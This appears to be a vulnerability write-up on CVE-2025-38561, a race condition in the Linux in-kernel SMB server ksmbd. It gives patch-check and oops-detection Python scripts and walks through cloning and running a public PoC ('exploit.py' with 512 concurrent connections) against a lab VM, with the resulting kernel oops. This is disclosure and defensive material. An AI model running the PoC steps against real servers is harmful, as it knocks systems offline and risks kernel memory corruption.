CVE-2025-38561 is a race condition vulnerability identified in the Linux kernel's ksmbd (in-kernel SMB server) component, with a CVSS 3.1 base score of 8.1. It was discovered on August 19, 2025 and disclosed publicly on September 24, 2025.
The flaw lies in the handling of sess->Preauth_HashValue during the SMB2 session setup request. Because there is no synchronization around freeing or modifying this memory during setup, concurrent session setup requests can race: one thread may free or reallocate the buffer while another is still accessing it.
This means that an attacker who can issue multiple simultaneous session setup requests (after authentication) can trigger this race to corrupt kernel memory and potentially achieve arbitrary code execution.
Any Linux kernel that includes the in-kernel SMB server ksmbd and does not contain the upstream fix from git commit 44a3059c4c8cc635a1fb2afd692d0730ca1ba4b6 is affected.
The upstream fix for this vulnerability was committed in git commit 44a3059c4c8cc635a1fb2afd692d0730ca1ba4b6 (ksmbd: fix Preauth_HashValue race condition) and has been back-ported into several stable kernel trees. Many distributions have already released, or will soon release, patched kernel packages.
On Debian-based systems, you can verify whether your kernel includes the patch by checking the package changelog:
apt changelog linux-image-$(uname -r) | grep ksmbd
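The grep above only tells you whether the word ksmbd appears somewhere in the changelog. The following script, an added example that is not part of the original post or the PoC repository, turns that check into a small assessment: it scans changelog text for the CVE id, the upstream commit subject or the commit hash, checks whether the ksmbd module is actually loaded (from /proc/modules), and combines the two into a status. The changelog samples and version numbers below are constructed; the function names are this script's own. On a real host, feed in the output of apt changelog linux-image-$(uname -r) and the contents of /proc/modules.

```python
"""Offline exposure check for CVE-2025-38561.

Added example (not code from the original post or the PoC repository).
Sample changelog and /proc/modules texts are constructed; the Ubuntu version
string mirrors the kernel shown in the post's dmesg output."""
import re

CVE_ID = "CVE-2025-38561"
# Subject line of the upstream fix, as quoted in the post; distribution
# changelogs usually carry it, with or without the CVE id.
FIX_SUBJECT = "ksmbd: fix Preauth_HashValue race condition"
FIX_COMMIT = "44a3059c4c8cc635a1fb2afd692d0730ca1ba4b6"


def find_fix_references(changelog: str) -> list:
    """Return changelog lines that reference the fix by CVE id, upstream
    subject, or an abbreviated (12+ hex digit) commit hash."""
    hits = []
    for line in changelog.splitlines():
        low = line.lower()
        if (CVE_ID.lower() in low
                or FIX_SUBJECT.lower() in low
                or re.search(r"\b" + FIX_COMMIT[:12], low)):
            hits.append(line.strip())
    return hits


def ksmbd_loaded(proc_modules: str) -> bool:
    """True if a 'ksmbd' entry appears in /proc/modules-style text
    (the first column of each line is the module name)."""
    return any(l.split()[0] == "ksmbd"
               for l in proc_modules.splitlines() if l.strip())


def assess(changelog: str, proc_modules: str) -> dict:
    """Combine the changelog scan and module state into one verdict."""
    hits = find_fix_references(changelog)
    loaded = ksmbd_loaded(proc_modules)
    if hits:
        status = "patched"
    elif loaded:
        status = "exposed"  # ksmbd active and no fix reference found
    else:
        status = "unpatched-but-ksmbd-not-loaded"
    return {"fix_references": hits, "ksmbd_loaded": loaded, "status": status}


# Constructed sample inputs (version numbers are made up, not real releases).
PATCHED_CHANGELOG = """\
linux (6.12.99-1) trixie-security; urgency=high

  * [ksmbd] fix Preauth_HashValue race condition (CVE-2025-38561)

 -- Example Maintainer <maint@example.invalid>  Thu, 02 Oct 2025 10:00:00 +0200
"""
OLD_CHANGELOG = """\
linux (5.15.0-119.129) jammy; urgency=medium

  * jammy/linux: 5.15.0-119.129 -proposed tracker

 -- Example Maintainer <maint@example.invalid>  Mon, 01 Sep 2025 10:00:00 +0200
"""
MODULES_WITH_KSMBD = ("ksmbd 462848 0 - Live 0xffffffffc0a00000\n"
                      "nls_utf8 16384 1 - Live 0xffffffffc09f0000\n")
MODULES_WITHOUT = "nls_utf8 16384 1 - Live 0xffffffffc09f0000\n"

if __name__ == "__main__":
    print(assess(PATCHED_CHANGELOG, MODULES_WITH_KSMBD))
    print(assess(OLD_CHANGELOG, MODULES_WITH_KSMBD))
    print(assess(OLD_CHANGELOG, MODULES_WITHOUT))
```

The "unpatched-but-ksmbd-not-loaded" result is worth keeping separate from "exposed": a kernel that ships the module but never loads it is not reachable over SMB, but it becomes exposed the moment setup.sh (or any admin) loads ksmbd, so it should still be scheduled for the upgrade.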
The only mitigation is to upgrade to a patched version as early as possible.
In the section below, I discuss the minimal PoC (Proof of Concept) for CVE-2025-38561 that can be found here.
As of October 9, 2025, Debian 11, 12 and 13 have been patched, while Ubuntu releases remain vulnerable to this CVE. Naturally, we used Ubuntu 22.04 for its vulnerable kernel and Debian 13 for its patched kernel to compare results.
Since it is a kernel vulnerability, two virtual machine instances with the following configurations were used:
Ubuntu Server and a Debian minimal installation were used.
All set, let us get to the PoC. We begin by cloning the git repository on the instance and changing into the cloned directory.
git clone https://github.com/toshithh/CVE-2025-38561
cd CVE-2025-38561
Before proceeding further, we need to escalate to root. On Debian, this can be done with
su root
and on Ubuntu,
sudo su
The folder contains a setup.sh script. It installs the required packages, loads the ksmbd kernel module and enables guest access to the SMB server. To run it:
chmod +x setup.sh
./setup.sh
To verify that the ksmbd server is working, list the shares with smbclient or check that port 445 is listening with netstat.
smbclient -L //localhost/ -N
#OR
netstat -tulnp | grep 445
The directory also contains two binary files, negotiate.bin and session_setup.bin, which are SMB packets captured with Wireshark. They are used because ksmbd performs strict checks on incoming packets and discards any that do not match its criteria.
To capture these packets, start a Wireshark session on your host machine and monitor the network traffic, then generate the SMB exchange by connecting to the server with smbclient:
smbclient -L //192.168.0.132/ -N
Then find the negotiate request and the session setup request and export those packets as depicted below.
With the basic setup complete, run exploit.py, specifying the target IP and the number of concurrent connections used to trigger the race condition. The vulnerable server gets stuck, while the patched server simply drops the broken connections.
python3 exploit.py 192.168.0.132 512
The screenshot below shows the difference between the execution of the exploit on a vulnerable vs a patched server.
The vulnerable server reaches the race condition quickly because of the incomplete session setup requests, and all connections get stuck, while the patched server handles and discards them through the synchronized code path.
The execution time on the two instances confirms this. Although both instances have the same configuration, the vulnerable instance quickly reaches the race condition and is denied service within a minute. On the patched instance, the server releases sess->Preauth_HashValue only at the end, under proper synchronization, so it takes 11 minutes to complete all requests (because of resource exhaustion)!
Finally, on the vulnerable server, check the kernel logs with dmesg and look for a kernel oops. It should look like the example below.
dmesg | tail -60
[33719.045396] ksmbd: NTLMSSP SecurityBufferLength 188
[33719.045676] ksmbd: connect success: accepted new connection
[33719.045698] ksmbd: RFC1002 header 264 bytes
[33719.047116] Unable to handle kernel paging request at virtual address ffff06b1ab079a00
[33719.047426] Mem abort info:
[33719.047532] ESR = 0x0000000096000004
[33719.047682] EC = 0x25: DABT (current EL), IL = 32 bits
[33719.047882] SET = 0, FnV = 0
[33719.047997] EA = 0, S1PTW = 0
[33719.048116] FSC = 0x04: level 0 translation fault
[33719.048299] Data abort info:
[33719.048408] ISV = 0, ISS = 0x00000004
[33719.048552] CM = 0, WnR = 0
[33719.048665] swapper pgtable: 4k pages, 48-bit VAs, pgdp=000000004a6fa000
[33719.048940] [ffff06b1ab079a00] pgd=0000000000000000, p4d=0000000000000000
[33719.049264] Internal error: Oops: 0000000096000004 [#2] SMP
[33719.049512] Modules linked in: nls_utf8 tcp_diag udp_diag inet_diag ksmbd crc32_generic rdma_cm iw_cm ib_cm ib_core cifs_arc4 tls binfmt_misc nls_iso8859_1 snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_intel_dspcfg input_leds joydev snd_hda_codec snd_hda_core snd_hwdep snd_pcm qemu_fw_cfg snd_timer snd soundcore sch_fq_codel dm_multipath scsi_dh_rdac scsi_dh_emc scsi_dh_alua efi_pstore ip_tables x_tables autofs4 btrfs blake2b_generic zstd_compress raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor xor_neon hid_generic usbhid hid raid6_pq libcrc32c raid1 raid0 multipath linear crct10dif_ce ghash_ce sha3_ce sha3_generic sha512_ce sha512_arm64 virtio_gpu virtio_dma_buf sha2_ce drm_kms_helper sha256_arm64 sha1_ce syscopyarea sysfillrect sysimgblt fb_sys_fops virtio_rng cec rc_core drm virtio_blk virtio_net xhci_pci net_failover xhci_pci_renesas failover aes_neon_bs aes_neon_blk aes_ce_blk crypto_simd cryptd aes_ce_cipher
[33719.053911] CPU: 3 PID: 2 Comm: kthreadd Tainted: G D 5.15.0-119-generic #129-Ubuntu
[33719.054307] Hardware name: QEMU QEMU Virtual Machine, BIOS 0.0.0 02/06/2015
[33719.054709] pstate: 40400005 (nZcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[33719.055003] pc : percpu_ref_get_many+0x2c/0x80
[33719.055243] lr : refill_obj_stock+0x78/0x170
[33719.055425] sp : ffff800008033280
[33719.055565] x29: ffff800008033280 x28: ffff63618e730e00 x27: ffff6361846c75b0
[33719.055866] x26: ffff6361846c75b0 x25: ffffc011a52d8000 x24: fffffd8d8611b1c0
[33719.056167] x23: ffff63619453f468 x22: 0000000000000000 x21: 0000000000000070
[33719.056467] x20: 0000000000000001 x19: 0000000000000001 x18: 0000000000000000
[33719.056768] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000
[33719.057068] x14: ffffc011a4eabf30 x13: ffff800008000000 x12: 0000000000000000
[33719.057368] x11: 0000000000000004 x10: 0000000000000003 x9 : ffffc011a2a20bc0
[33719.057668] x8 : 0000000000000238 x7 : 0000000000000013 x6 : ffff636181c550a8
[33719.057968] x5 : 0000000000000006 x4 : 0000000000000001 x3 : 0000000000000000
[33719.058268] x2 : ffff63619453f468 x1 : ffffa3501b711000 x0 : ffff06b1ab079a00
[33719.058664] Call trace:
[33719.058777] percpu_ref_get_many+0x2c/0x80
[33719.058952] refill_obj_stock+0x78/0x170
[33719.059118] obj_cgroup_uncharge+0x1c/0x2c
[33719.059292] kmem_cache_free+0x2f8/0x454
[33719.059458] free_buffer_head+0x30/0x60
[33719.059645] try_to_free_buffers+0xd8/0x18c
[33719.059821] jbd2_journal_try_to_free_buffers+0xe0/0x1c0
[33719.060069] ext4_releasepage+0x54/0xb4
[33719.060244] try_to_release_page+0x6c/0xac
[33719.060444] shrink_page_list+0xba0/0xf60
[33719.060613] shrink_inactive_list+0x16c/0x54c
[33719.060796] shrink_lruvec+0x2cc/0x3c0
[33719.060954] shrink_node_memcgs+0x1c0/0x230
[33719.061130] shrink_node+0x164/0x6f0
[33719.061281] do_try_to_free_pages+0xf4/0x530
[33719.061460] try_to_free_pages+0x114/0x210
[33719.061633] __alloc_pages_slowpath.constprop.0+0x354/0x82c
[33719.061882] __alloc_pages+0x2a4/0x310
[33719.062075] alloc_pages+0x9c/0x19c
[33719.062222] __vmalloc_area_node.constprop.0+0x22c/0x354
[33719.062446] __vmalloc_node_range+0x7c/0x11c
[33719.062720] alloc_thread_stack_node+0x11c/0x1f0
[33719.062949] dup_task_struct+0x5c/0x2d0
[33719.063112] copy_process+0x1ec/0x12a0
[33719.063272] kernel_clone+0x94/0x4ac
[33719.063424] kernel_thread+0x74/0xa4
[33719.063576] kthreadd+0x164/0x320
[33719.063737] ret_from_fork+0x10/0x20
[33719.063921] Code: f240041f 54000181 d538d081 8b010000 (f833001f)
[33719.064196] ---[ end trace a874643b7b9fc499 ]---
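Reading an oops by eye works once; on a fleet you want the same check as a script. The following Python, an added example that is not part of the original post or the PoC repository, parses dmesg-style output, finds the first "Internal error: Oops" record, records the faulting pc and call trace, checks whether ksmbd is in the "Modules linked in" list, and counts ksmbd messages in the seconds before the fault. The sample input is a trimmed copy of the oops shown above (the module list line is shortened); the field names and the classification labels are this script's own. Note what the trace itself tells you: the fault hit kthreadd (PID 2) inside kmem_cache_free during memory reclaim, so the corruption caused by ksmbd surfaced in an unrelated kernel thread, which is why the detection keys on ksmbd being loaded and active just before the oops rather than on ksmbd symbols in the trace.

```python
"""Detect a kernel oops that follows ksmbd activity in dmesg output.

Added example, not code from the original post or the PoC repository. The
sample is a trimmed copy of the post's oops; the 'Modules linked in' line
has been shortened. Field and label names are this script's own."""
import re
from typing import List, Optional, Tuple

# "[33719.045396] message" -> (timestamp, message)
TS_RE = re.compile(r"^\[\s*(\d+\.\d+)\]\s?(.*)$")


def parse_dmesg(text: str) -> List[Tuple[float, str]]:
    """Split raw dmesg output into (timestamp, message) pairs; lines without
    a timestamp prefix are skipped."""
    out = []
    for line in text.splitlines():
        m = TS_RE.match(line)
        if m:
            out.append((float(m.group(1)), m.group(2).strip()))
    return out


def find_oops(entries: List[Tuple[float, str]], window_s: float = 5.0) -> Optional[dict]:
    """Return details of the first 'Internal error: Oops' record, or None."""
    for i, (ts, msg) in enumerate(entries):
        if msg.startswith("Internal error: Oops"):
            break
    else:
        return None
    info = {"timestamp": ts, "header": msg, "ksmbd_loaded": False,
            "pc": None, "call_trace": [], "ksmbd_msgs_before": 0}
    # ksmbd log lines within window_s seconds before the fault
    info["ksmbd_msgs_before"] = sum(
        1 for t, m in entries[:i] if m.startswith("ksmbd:") and ts - t <= window_s)
    in_trace = False
    for _, m in entries[i:]:
        if m.startswith("Modules linked in:"):
            info["ksmbd_loaded"] = "ksmbd" in m.split()[3:]  # skip the 3 header words
        elif m.startswith("pc :"):
            info["pc"] = m.split(":", 1)[1].strip()
        elif m.startswith("Call trace:"):
            in_trace = True
        elif m.startswith("---[ end trace"):
            break
        elif in_trace and m and not m.startswith("Code:"):
            info["call_trace"].append(m)
    return info


def classify(info: Optional[dict]) -> str:
    """Map the parsed record to a coarse triage label."""
    if info is None:
        return "no-oops"
    if info["ksmbd_loaded"] and info["ksmbd_msgs_before"] > 0:
        return "oops-with-recent-ksmbd-activity"
    if info["ksmbd_loaded"]:
        return "oops-ksmbd-loaded"
    return "oops-unrelated-to-ksmbd"


# Trimmed copy of the oops from the post (module list shortened).
SAMPLE_DMESG = """\
[33719.045396] ksmbd: NTLMSSP SecurityBufferLength 188
[33719.045676] ksmbd: connect success: accepted new connection
[33719.045698] ksmbd: RFC1002 header 264 bytes
[33719.047116] Unable to handle kernel paging request at virtual address ffff06b1ab079a00
[33719.049264] Internal error: Oops: 0000000096000004 [#2] SMP
[33719.049512] Modules linked in: nls_utf8 tcp_diag udp_diag inet_diag ksmbd crc32_generic cifs_arc4
[33719.053911] CPU: 3 PID: 2 Comm: kthreadd Tainted: G D 5.15.0-119-generic #129-Ubuntu
[33719.055003] pc : percpu_ref_get_many+0x2c/0x80
[33719.055243] lr : refill_obj_stock+0x78/0x170
[33719.058664] Call trace:
[33719.058777] percpu_ref_get_many+0x2c/0x80
[33719.058952] refill_obj_stock+0x78/0x170
[33719.059118] obj_cgroup_uncharge+0x1c/0x2c
[33719.059292] kmem_cache_free+0x2f8/0x454
[33719.063737] ret_from_fork+0x10/0x20
[33719.063921] Code: f240041f 54000181 d538d081 8b010000 (f833001f)
[33719.064196] ---[ end trace a874643b7b9fc499 ]---
"""

if __name__ == "__main__":
    rec = find_oops(parse_dmesg(SAMPLE_DMESG))
    print(classify(rec))
    print(rec)
```

Run it against dmesg output (for example, dmesg | python3 this_script.py after replacing SAMPLE_DMESG with sys.stdin.read()); a result of "oops-with-recent-ksmbd-activity" on a host whose changelog does not reference the fix is the signal to take the box off the network and upgrade the kernel.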